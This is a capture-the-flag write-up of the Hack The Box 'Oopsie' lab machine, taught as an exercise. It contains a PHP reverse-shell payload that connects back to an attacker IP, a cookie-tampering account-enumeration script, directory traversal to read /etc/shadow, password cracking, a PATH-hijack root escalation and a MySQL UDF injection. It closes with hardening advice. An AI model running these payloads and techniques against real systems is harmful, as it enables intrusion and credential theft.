HTB Starting Point: Oopsie

HTB Starting Point: Oopsie

Complete write-up decorated for educational purposes

Oopsie is a 2nd box from Starting Point path on Starting Point - Tier 2. This path is composed of 9 boxes in a way that later boxes use information (like credentials) gathered from the previous ones.

This box features debugging session and MySQL enumeration.

Basic Information

#
TypeStarting Point
Name** Hack The Box / Oopsie**
Pwned2021/05/30
URLsStarting Point - Tier 2
AuthorAsentinn / OkabeRintaro
https://ctftime.org/team/152207

Target of Evaluation

Setting shell variable IP=10.10.10.28

Back to top

Recon

$ nmap -sV -sC -p- $IP -oN nmap-$IP.out

5242615545503.png

whatweb $IP > whatweb.out

3817402756411.png

We can remember that possible user is admin.

$ gobuster dir -w /usr/wl/dirbuster-m.txt -x txt,php -u http://$1 -o gbdir-$1-http.out

2579806462988.png

$ curl -X OPTIONS -I http://$IP/uploads/

5710042871254.png

$ nikto -h $IP

5533718588824.png

Back to top

Website (:80)

3254609819658.png

At the bottom of the page we see that it should have some login front.

2472539506300.png

By looking at the a source code we can find where the login page is located (also we can see that in the nikto output):

908940052778.png

/cdn-cgi/login/

5109588867122.png

Here, in the source code, apart from the following JS script we don't see anything useful.

4759601737308.png

Ok, now that we don't have any clues about credentials we can use - but let's try some of these from the Archetype box.

admin/MEGACORP_4dm1n!! is the answer.

1054904841448.png

On the top navigation bar there is an Upload page - this is something we should check right away for possible reverse shell uploads.

/cdn-cgi/login/admin.php?content=uploads

558202605415.png

That's an interesting one. We come back here after we enumerate users

/cdn-cgi/login/admin.php?content=accounts&id=1

1095069701766.png

Using the Developer Tools (F12) we can peek the request and cookies:

2626903306530.png

Let's enumerate the id query parameter to discover some users.

# account_enum.py

import requests
import urllib3
import re
from tabulate import tabulate

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

host = "10.10.10.28"
url = f"http://{host}/cdn-cgi/login/admin.php?content=accounts&id="

headers = {}
cookies = {"user":"34322", "role":"admin"}

t_header = ["ID", "Name", "Email"]
t_matches = []

re_pattern = "<table><tr><th>Access ID</th><th>Name</th><th>Email</th></tr><tr><td>(?P<ID>.+)</td><td>(?P<Name>.+)</td><td>(?P<Email>.+)</td></tr></table"

for i in range(100):
    r = requests.get(f"{url}{i}", cookies=cookies, headers=headers, verify=False)

    match = re.search(re_pattern, r.text)

    if match != None:
        t_matches.append([match["ID"], match["Name"], match["Email"]])

print(tabulate(t_matches, t_header))

Play with this regex here.

2874780499364.png

Ok, so when we replace the cookies with super admin account details, we should be able to see the Uploads page.

5332291816323.png

Voila!

2561109258800.png

Back to top

Exploiting (user shell)

First, we can try the simplest payload:

# pshell.php

<?php
$sock=fsockopen("10.10.XX.XXX",4445);
$proc=proc_open('/bin/sh -i', array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?>

1921633931166.png

Let's see curl http://10.10.10.28/uploads/pshell.php

Yup, reverse shell obtained.

Semi stabilizing shell and alias

$ alias ls='ls --color=always -lAh'
$ python3 -c "import pty;pty.spawn('/bin/bash')"

Some more interesting findings:

75148064956.png

236932727586.png

Another credential to add.

$ echo 'robert|M3g4C0rpUs3r!' | tee -a ../.credentials
robert|M3g4C0rpUs3r!

$ cat ../.credentials

sql_svc|M3g4c0rp123
administrator|MEGACORP_4dm1n!!
robert|M3g4C0rpUs3r!

Search for user flag:

1223491098411.png

Back to top

Lateral movement

Now we can try to reuse DB credentials to switch shell user.

2039414698440.png

Check for sudo rights

42831952712.png

bugtracker group

This group is not a standard one. We should be curious about such creations. By using find command, we can easily track down all files to which group have special permissions to.

find / -group bugtracker 2>/dev/null

2070396192989.png

Interesting. It looks like some custom application. Lets strace it.

$ strace bugtracker

4200016117802.png

It is waiting for the input - type anything and hit enter. Later down the stack, we see that application permissions are temporarily elevated to the root permissions

4973533837197.png

And following path is cat out.

686007484704.png

It is even better visible by using ltrace

3389142210754.png

New to strace and ltrace? Check my other write-up: Passphrase

Application is trying to cat the file out. Using directory traversal, we can read the shadow file.

robert@oopsie:/var/www/html/uploads$ bugtracker

3058473057245.png

And try to crack root password it with john:

$ unshadow passwd.txt shadow.txt > unshadowed.txt
$ john --wordlist=/usr/wl/rockyou.txt unshadowed.txt

Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:53:11 DONE (2021-05-30 15:45) 0g/s 4493p/s 4493c/s 4493C/s !!!playboy!!!7..*7¡Vamos!
Session completed

But we can't crack it. At this point, we can simply cat out the root flag

5787352694397.png

But let's assume we don't know where the flag lays.

Back to top

Escalating Privileges

🔔 CyberEthical.Me is maintained purely from your donations - consider one-time sponsoring on the Sponsor button or 🎁 become a Patron which also gives you some bonus perks.

In the debugging sessions, we see that cat is not referenced via an absolute /bin/cat path. We can exploit that. The plan is to modify PATH variable to include directory, so it will be searched before /bin/. In this directory, we are going to create cat file that will call /bin/bash. As we've observed before, cat (whatever it may be) is run with temporary elevated privileges - that way we can get the root shell.

export PATH=/tmp:$PATH
cd /tmp/
echo '/bin/sh' > cat
chmod +x cat

5171782624492.png

That way, we have a cat executable file that will be called inside bugtracker instead /bin/cat.

241768606964.png

5116127633069.png

Remember that because we have modified cat in a PATH we should, either unset the /tmp: or call cat via its absolute path.

3645601596404.png

Back to top

Post-exploitation

When you read the reports in the /root/reports you will see many references to the filezilla and its config. It happens that .config directory actually exists in the /root

817353914711.png

Alright - another credential to save.

echo 'ftpuser|mc@F1l3ZilL4' | tee -a ../.credentials

MySQL

Let's see what we can get by using robert account with mysql.

129463566212.png

mysql> use garage;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| garage             |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql> show tables;
+------------------+
| Tables_in_garage |
+------------------+
| accounts         |
| branding         |
| clients          |
+------------------+
3 rows in set (0.00 sec)

Let's grab password hashes and check it on CrackStation.

mysql> select user,authentication_string from mysql.user;
+------------------+-------------------------------------------+
| user             | authentication_string                     |
+------------------+-------------------------------------------+
| root             |                                           |
| mysql.session    | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
| mysql.sys        | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
| debian-sys-maint | *D1DBADEE9E3EE2D0767B40F19463FB6C5EB6D594 |
| dbuser           | *9CFBBC772F3F6C106020035386DA5BBBF1249A11 |
| robert           | *2429DD64CD7A63687EA257432557FEFDA6D6F2A1 |
+------------------+-------------------------------------------+
6 rows in set (0.00 sec)

4079019178801.png

echo 'dbuser|toor' | tee -a ../.credentials

Arbitrary Library Injection (rabbit hole?)

This exploit is abusing user privileges to INSERT and DELETE on 'mysql' administrative database, so it is possible to use a library located in an arbitrary directory. We can use it to prepare a library with do_system function to execute shell commands with root privileges.

For more detailed steps, please refer to MySQL Arbitrary Library Injection @ Wisec.It.

For a quick wrap up - I did manage to upload the library payload and add its path to mysql.func table.

INSERT INTO mysql.func (name,dl) VALUES ('do_system','/var/lib/mysql-files/lib_mysqludf_sys.so');

The last step was restarting the MySQL server - which I could have done on user account partially. Following will shut down the MySQL...

CREATE FUNCTION exit RETURNS INTEGER SONAME 'libc.so.6';
SELECT exit(0);

... but I didn't find a way to start it again. Maybe it is not possible?

Back to top

Hardening Ideas

Use absolute paths to the binaries

Using relative paths, you are creating a vulnerability that could potentially lead to executing malicious code and in the worst scenario cause privilege escalation.

Principle of Least Privilege

On this MySQL instance, too many accounts have Priv_system permissions. Always start from the least privileged permission and add more of them as needed.

Don't reuse passwords

This advice probably is applicable to all Starting Point boxes, as they are created such intentionally - but it's good to spotlight it.

Like what you see? Join the Hashnode.com now. Things that are awesome:

✔ Automatic GitHub Backup

✔ Write in Markdown

✔ Free domain mapping

✔ CDN hosted images

✔ Free in-built newsletter service

By using my link you can help me unlock the ambasador role, which cost you nothing and gives me some additional features to support my content creation mojo.

Back to top

Additional readings

📌 Follow the #CyberEthical hashtag on the social media

👉 Instagram: @cyber.ethical.me

👉 LinkedIn: Kamil Gierach-Pacanek

👉 Twitter: @cyberethical_me

👉 Facebook: @CyberEthicalMe

Back to top

Check other write-ups from the Starting Point path - links below the article, or navigate directly to the series here.

Did you find this article valuable?

Support Kamil Gierach-Pacanek by becoming a sponsor. Any amount is appreciated!